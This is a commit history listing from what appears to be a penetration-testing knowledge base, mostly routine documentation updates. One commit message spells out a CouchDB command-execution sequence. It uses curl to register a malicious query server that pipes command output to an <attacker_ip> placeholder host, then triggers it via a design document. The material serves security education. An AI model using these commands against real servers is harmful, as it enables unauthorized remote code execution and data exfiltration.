Commit Graph

375 Commits

Author SHA1 Message Date
CPol
a24d4e91d6
GitBook: [master] 2 pages and 4 assets modified 2021-06-08 21:58:39 +00:00
CPol
c2b98f8fb4
GitBook: [master] 3 pages and one asset modified 2021-06-08 20:38:29 +00:00
CPol
ad1992544c
GitBook: [master] 4 pages modified 2021-06-08 18:47:44 +00:00
CPol
2698f73ac2
GitBook: [master] 8 pages modified 2021-06-07 09:30:58 +00:00
CPol
452bc1d9fc
GitBook: [master] 7 pages and 14 assets modified 2021-06-06 18:35:32 +00:00
Carlos Polop
fe24582030
Merge pull request #124 from clem9669/patch-6
Update Pentesting SAP
2021-06-06 12:42:05 +02:00
CPol
cdf1bae8e5
GitBook: [master] one page modified 2021-06-01 00:43:40 +00:00
CPol
2a0b46ccbb
GitBook: [master] one page and one asset modified 2021-05-31 23:28:35 +00:00
clem9669
a5851e4eab
Update Pentesting SAP #123
Updating first link as mentioned in PR #123
2021-05-31 15:19:40 +00:00
CPol
54837b9612
GitBook: [master] 21 pages modified 2021-05-31 09:39:02 +00:00
CPol
2f669dffc0
GitBook: [master] 8 pages and 14 assets modified 2021-05-29 20:00:49 +00:00
0xalwayslucky
2cf1d99f9c Kubernetes: kubectl cheatsheet/alias 2021-05-27 23:08:48 +02:00
0xalwayslucky
5796189971 Kubernetes: escaping a pod; hotfix format 2021-05-27 22:35:31 +02:00
0xalwayslucky
2697a28fce Kubernetes: escaping a pod 2021-05-27 22:25:20 +02:00
CPol
5f83c0bdad
GitBook: [master] 3 pages and 3 assets modified 2021-05-27 11:24:11 +00:00
CPol
9e80c3be33
GitBook: [master] 472 pages modified 2021-05-27 10:20:50 +00:00
CPol
cb8be9a38c
GitBook: [master] one page modified 2021-05-26 11:19:55 +00:00
CPol
d77b102952
GitBook: [master] one page modified 2021-05-26 11:18:48 +00:00
CPol
e7afb9504e
GitBook: [master] one page modified 2021-05-26 09:08:21 +00:00
CPol
487861e0f3
GitBook: [master] 473 pages modified 2021-05-25 23:11:03 +00:00
CPol
fd5d0989f3
GitBook: [master] 7 pages and 8 assets modified 2021-05-25 23:07:25 +00:00
Carlos Polop
6cd7d66ee5
Merge pull request #116 from jeffbencteux/patch-1
Command execution via query_servers fix
2021-05-26 00:06:07 +01:00
Carlos Polop
a2d1f6c4da
Merge pull request #115 from Vincevrp/patch-2
Add missing hyphen
2021-05-25 23:52:47 +01:00
Carlos Polop
c8b8631ec8
Merge pull request #114 from Vincevrp/patch-1
Link to English kubectl install documentation
2021-05-25 23:52:23 +01:00
CPol
353938b47c
GitBook: [master] 5 pages and 10 assets modified 2021-05-25 22:52:07 +00:00
Carlos Polop
97c49bdb7a
Merge pull request #112 from clem9669/patch-5
Update Pentesting SNMP
2021-05-25 23:51:28 +01:00
Carlos Polop
097da68802
Merge pull request #111 from AssassinUKG/patch-2
Created 1080
2021-05-25 23:46:44 +01:00
CPol
f60b8d7ea8
GitBook: [master] one page modified 2021-05-24 15:55:07 +00:00
Jeffrey Bencteux
e505cc2b55
Command execution via query_servers fix
Hey man, I got a working example, I think the issue is that you are requesting your view with POST rather than PUT method. Following works for me:

curl -X PUT 'http://<target_ip>:5984/_node/couchdb@localhost/_config/query_servers/cmd' -d '"id | curl http://<attacker_ip>:<port> -d @-"'
curl -X PUT 'http://<target_ip>:5984/testbed'
curl -X PUT 'http://<target_ip>:5984/testbed/whatever' -d '{"_id":"770855a97726d5666d70a22173005c77"}'
curl -X PUT http://<target_ip>:5984/testbed/_design/whatever -d '{"_id":"_design/test","views":{"anything":{"map":""} },"language":"cmd"}' -H "Content-Type: application/json"
2021-05-24 10:43:15 +02:00
Vince
92096e6cd1 Add missing hyphen
The "enumeration from a pod" command example to get all services is missing a hyphen.
2021-05-23 23:24:28 +02:00
Vince
44e0145e11
Link to English kubectl install documentation
The Kubernetes "enumeration from a pod" documentation links to Spanish instructions to install kubectl. This commit changes the URL to the English documentation.
2021-05-23 21:11:01 +00:00
clem9669
430a952347
Update Pentesting SNMP
Adding an extra command to gather information about users
2021-05-19 12:49:04 +00:00
CPol
36c20843d1
GitBook: [master] 461 pages modified 2021-05-15 12:48:28 +00:00
AssassinUKG
e6d2dc62a5
Updated some errors
updated file name to lowercase, added in output
2021-05-14 01:14:06 +01:00
AssassinUKG
52883e4161
Created 1080
I tried to keep to your format and style for the document. very sorry if this is not fully correct. Thank you again for all of your hardwork!
2021-05-14 01:08:24 +01:00
CPol
19ef41e986
GitBook: [master] 2 pages modified 2021-05-13 17:53:07 +00:00
CPol
4e57770caf
GitBook: [master] 4 pages modified 2021-05-11 23:55:16 +00:00
Carlos Polop
cac009b495
Merge pull request #109 from noraj/patch-1
Enumerate Local users with lookupsid
2021-05-11 00:40:12 +02:00
Carlos Polop
d9c09f71c0
Merge pull request #108 from chhajershrenik/patch-1
Enumerating Linked Server
2021-05-11 00:39:21 +02:00
Alexandre ZANNI
6c19730309
Enumerate Local users with lookupsid 2021-05-10 18:48:27 +02:00
CPol
b310683d43
GitBook: [master] one page modified 2021-05-10 08:52:30 +00:00
chhajershrenik
c19d51a6ba
Enumerating Linked Server
Added queries for enumerating linked sql servers databases connected to mssql.
2021-05-10 14:10:35 +05:30
CPol
fa639e1bab
GitBook: [master] 2 pages and 4 assets modified 2021-05-07 15:55:24 +00:00
CPol
083b9fa5f7
GitBook: [master] 457 pages modified 2021-05-04 11:44:49 +00:00
CPol
c620191fb3
GitBook: [master] one page modified 2021-05-02 09:50:46 +00:00
CPol
c6787fa07b
GitBook: [master] 3 pages and 8 assets modified 2021-04-30 12:16:33 +00:00
Carlos Polop
8cb860d13c
Merge pull request #105 from ChrisPritchard/patch-1
Update 8009-pentesting-apache-jserv-protocol-ajp.md
2021-04-30 11:20:35 +02:00
CPol
b486b9fee1
GitBook: [master] 454 pages modified 2021-04-29 12:12:01 +00:00
CPol
f7b6e4a914
GitBook: [master] one page modified 2021-04-29 10:01:21 +00:00
CPol
9a4e816308
GitBook: [master] one page modified 2021-04-28 23:45:03 +00:00